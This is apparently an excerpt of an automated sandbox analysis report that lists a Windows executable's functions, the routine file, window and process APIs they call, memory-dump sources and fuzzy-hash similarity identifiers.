Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileOperation
String ID:
API String ID: 2032784890-0
Opcode ID: 48614b0a7a63aa292b80d1f2e15a26b90fb599994bbfe4847665d7305ba6bd42
Instruction ID: 442fae7be0462139d0ee7ffd93acceea91cff6a930a3db2187679205077e6a7f
Opcode Fuzzy Hash: 48614b0a7a63aa292b80d1f2e15a26b90fb599994bbfe4847665d7305ba6bd42
Instruction Fuzzy Hash: CC618C32B04B82D9EB00CF65D8A82AC3375EB85799F414636DB9D93BA9DF38D595C300

Function 00007FF6CCC92134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF6CCC921CF
CreateFileW.KERNEL32 ref: 00007FF6CCC9223C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC922D8

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: CreateFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2272807158-0
Opcode ID: 650906bb36444c59f78769edd7e70a31dc34f49dc41decdeb4024168be9b1e6b
Instruction ID: 8ed888f786de08b7067bdcd235a69590165ce27587ef6938a0e690d784aefdd1
Opcode Fuzzy Hash: 650906bb36444c59f78769edd7e70a31dc34f49dc41decdeb4024168be9b1e6b
Instruction Fuzzy Hash: 64419E72A18AC282EB248F15E44426963B1FB84BB9F105735DFED87AD5CF3CE4A58700

Function 00007FF6CCC823F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 00007FF6CCC8243E
GetWindowTextW.USER32 ref: 00007FF6CCC82476
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC82505

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2176759853-0
Opcode ID: 1bf85210b9a87779fb11811f9a7e2f8ba75c636e64e4f9da94f36f1c7ff0fb34
Instruction ID: 39b01348d9b6467f26cc6e8b2bdb26d7d062b86e6679881529d1c676eda81389
Opcode Fuzzy Hash: 1bf85210b9a87779fb11811f9a7e2f8ba75c636e64e4f9da94f36f1c7ff0fb34
Instruction Fuzzy Hash: 7C21A062A28BC182EA109F65A84057AB3B4FB89BD1F145236EFDD83B95CF3CD190C740

Function 00007FF6CCCA1F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6CCCA205B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6CCCA2077
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6CCCA2093

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: std::bad_alloc::bad_alloc
String ID:
API String ID: 1875163511-0
Opcode ID: 65d8091f10f06cce83768fe095ce433e052fa83f4fe25a8c85fad3cbd40ccd0d
Instruction ID: 199c23e8423415c08dd5cde8ec4fe0ccf860f85431ee0f9f487b42f0228817ab
Opcode Fuzzy Hash: 65d8091f10f06cce83768fe095ce433e052fa83f4fe25a8c85fad3cbd40ccd0d
Instruction Fuzzy Hash: 33317122A0DAD691FB259F15E4483B963B0FB90B85F544431E7CC86AA9DF7CE987C301

Function 00007FF6CCC93D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,00000000,00000001,?,00007FF6CCCA07E1), ref: 00007FF6CCC93D5E
SetFileAttributesW.KERNEL32 ref: 00007FF6CCC93DB0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC93E1A

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: 30421b436104fcb90b4cd2208b99a3bf3782908f0837f7a91d3eb4cb73bf7196
Instruction ID: 77830d67d3be43f8fbb10c74f210d596413ecb3dca69885dd373e79e62d3a6cc
Opcode Fuzzy Hash: 30421b436104fcb90b4cd2208b99a3bf3782908f0837f7a91d3eb4cb73bf7196
Instruction Fuzzy Hash: AE21C823A18AC181EA209F25E45526A6371FF88B9AF145230EFDD836A5DF3CD541C700

Function 00007FF6CCC931BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00007FF6CCCA0822), ref: 00007FF6CCC931E7
DeleteFileW.KERNEL32 ref: 00007FF6CCC93237
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC932A1

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3118131910-0
Opcode ID: 539e2a0488ada646b9a4eb5c90a9f278ffd13936dc8dbc7caf4118334a65d282
Instruction ID: 65276812291d9c8427920e5ba090c2e722b19f858d2a759267a0d48e3a074e86
Opcode Fuzzy Hash: 539e2a0488ada646b9a4eb5c90a9f278ffd13936dc8dbc7caf4118334a65d282
Instruction Fuzzy Hash: 49218362A18BC181EA109F25E45526E6370FB89B99F541231EBEE86AE9DF3CD541C700

Function 00007FF6CCC932BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00007FF6CCC9E5B1,?,?,?,00000000,?), ref: 00007FF6CCC932E7
GetFileAttributesW.KERNELBASE ref: 00007FF6CCC93334
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC93399

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: a8bcf6e2598255fa991570dfaf367ef52c8767d47326b3423635884fafe6ecbe
Instruction ID: 5990f2eeac42c7b2224928bca045329ec0ebb1c6babe3b1b3610383b4cff8696
Opcode Fuzzy Hash: a8bcf6e2598255fa991570dfaf367ef52c8767d47326b3423635884fafe6ecbe
Instruction Fuzzy Hash: 06214122A18AC181EA109F29E45512A6371FB89BA5F541231EBED87BE5DF3CD541C704

Function 00007FF6CCCBBF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6CCCBBF48), ref: 00007FF6CCCBBF8C
TerminateProcess.KERNEL32(?,?,?,00007FF6CCCBBF48), ref: 00007FF6CCCBBF97
ExitProcess.KERNEL32 ref: 00007FF6CCCBBFA6

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction ID: 893b3f9ac43ecd783e3380e7f28c1d53a3494533d6d00f76e7740dd90189c152
Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction Fuzzy Hash: 39E04F28F0438546EB546FB198F577A23726F98B43F145438CACE83396CE3DE4098700

Function 00007FF6CCC8F578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8F895
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8F89B

Part of subcall function 00007FF6CCC93EC8: FindClose.KERNELBASE(?,?,00000000,00007FF6CCCA0811), ref: 00007FF6CCC93EFD

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseFind
String ID:
API String ID: 3587649625-0
Opcode ID: 9a071fa467f85a34a6f05ca9243d790f6abafaa5b1570881c384a2819231f8c8
Instruction ID: a92a2449fe11ea788e0446ba6e91435fd4f0962e8d3135ee031b62d7dd608d52
Opcode Fuzzy Hash: 9a071fa467f85a34a6f05ca9243d790f6abafaa5b1570881c384a2819231f8c8
Instruction Fuzzy Hash: 7B919D72A18AC290FB10DF64D4446AE6371FB85799F904236EB9C87AE9DF78D585C300

Function 00007FF6CCC83904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC83AB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC83AB9

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 08c6e2d20e94fe5d114b94b17f84e93e5249d169b81ce8341d273cd43f7755ea
Instruction ID: b7017b55b9bd6e38a7ab353cb1eb7aa83e4d7fbde8932d215b52e5d4945f0e19
Opcode Fuzzy Hash: 08c6e2d20e94fe5d114b94b17f84e93e5249d169b81ce8341d273cd43f7755ea
Instruction Fuzzy Hash: E9419362F1469284FB00DFB5D4546EE2370AF44BD9F186136DFADA7A9ADE3CD4828300

Function 00007FF6CCC92778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF6CCC9274D), ref: 00007FF6CCC928A9
GetLastError.KERNEL32(?,00007FF6CCC9274D), ref: 00007FF6CCC928B8

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction ID: ea6663e390b8dab4d9c6366f92d643391b65d1e9494210639b99a338fe8118a7
Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction Fuzzy Hash: 26319623B19AD682EA605F2AD9806B96374AF04BEAF140131DFDD97B90DE3CD4829744

Function 00007FF6CCC822BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF6CCC822F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC823F0

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Item_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1746051919-0
Opcode ID: 95739ad7301a08b82252912ada3ab6f57aee1bff7a48893d1edd4817af44debc
Instruction ID: 6fa146b5f79b63af3607d194499969c489d52688188cbf3437a01496597000a2
Opcode Fuzzy Hash: 95739ad7301a08b82252912ada3ab6f57aee1bff7a48893d1edd4817af44debc
Instruction Fuzzy Hash: 9B31AD22A1878682EA249F65F45976BB374EB84B91F445236EBDC87B96DF3CE1408700

Function 00007FF6CCC92AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32 ref: 00007FF6CCC92AFE
SetFileTime.KERNELBASE ref: 00007FF6CCC92B9B

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction ID: 053ac73eafb9dbd32c00eab952118841ed58eeeeeda0dab0fe4199eda6d6cae7
Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction Fuzzy Hash: 4E21B022E09BC391EA628F11E4047BA57F0AF027AAF154031DFCE46295EE3CD58AC200

Function 00007FF6CCC9AAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF6CCC9AB67
LoadStringW.USER32 ref: 00007FF6CCC9AB80

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction ID: 835c922b3287e657cbb00dd8d46d70dd163cb7f9b5a4e23eae478fd95161f657
Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction Fuzzy Hash: 68118B71B0879186EB009F5AA841028B7B1BB8AFC6F544439CB8DE3B20DE7CE5818384

Function 00007FF6CCC92BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF6CCC92C11
GetLastError.KERNEL32 ref: 00007FF6CCC92C1E

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction ID: 280a9198484d00f3b7d62f689869d2dc08d9b87c96a5cfadf6d20671852e3d39
Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction Fuzzy Hash: 86115921E0868281FB608F25E8816696670FB55BBAF544332DBEDD66E4CF2CE583C340

Function 00007FF6CCC8255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC9A4AC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6CCC9A504
Part of subcall function 00007FF6CCC9A4AC: SetDlgItemTextW.USER32 ref: 00007FF6CCC9A573
Part of subcall function 00007FF6CCC9A4AC: GetWindowRect.USER32 ref: 00007FF6CCC9A5AD
Part of subcall function 00007FF6CCC9A4AC: GetClientRect.USER32 ref: 00007FF6CCC9A5BB

GetDlgItem.USER32 ref: 00007FF6CCC825AC
SetDlgItemTextW.USER32 ref: 00007FF6CCC825C8

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Item$RectText$ClientWindowswprintf
String ID:
API String ID: 402765569-0
Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
Instruction ID: 2029f324430c657289b9fde1a086118d222d24dd2a40a721c41ef42c145cb4da
Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
Instruction Fuzzy Hash: B0017120A4D2CA41FF595F52A45967A53B16F86787F08003ACACD866DADE3CE8C5C340

Function 00007FF6CCC9EB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6CCC9EBAD,?,?,?,?,00007FF6CCC95752,?,?,?,00007FF6CCC956DE), ref: 00007FF6CCC9EB5C
GetProcessAffinityMask.KERNEL32 ref: 00007FF6CCC9EB6F

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction ID: 7642a790163a4a8f3dad2a3531c90d673e510c8428ca3231c33980f8569b8655
Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction Fuzzy Hash: A4E02B61F145C646DF089F55C4405EA73F2BFC8B40F848035D74BC3614DE2CE1458B00

Function 00007FF6CCCB21D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CCCB2200

Part of subcall function 00007FF6CCCB2F7C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6CCCB2F85

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CCCB2206

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
Instruction ID: 8e4c46bf343be64ccf8098c9a02ae9c813d765f0128670e56aa701ab89e44f34
Opcode Fuzzy Hash: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
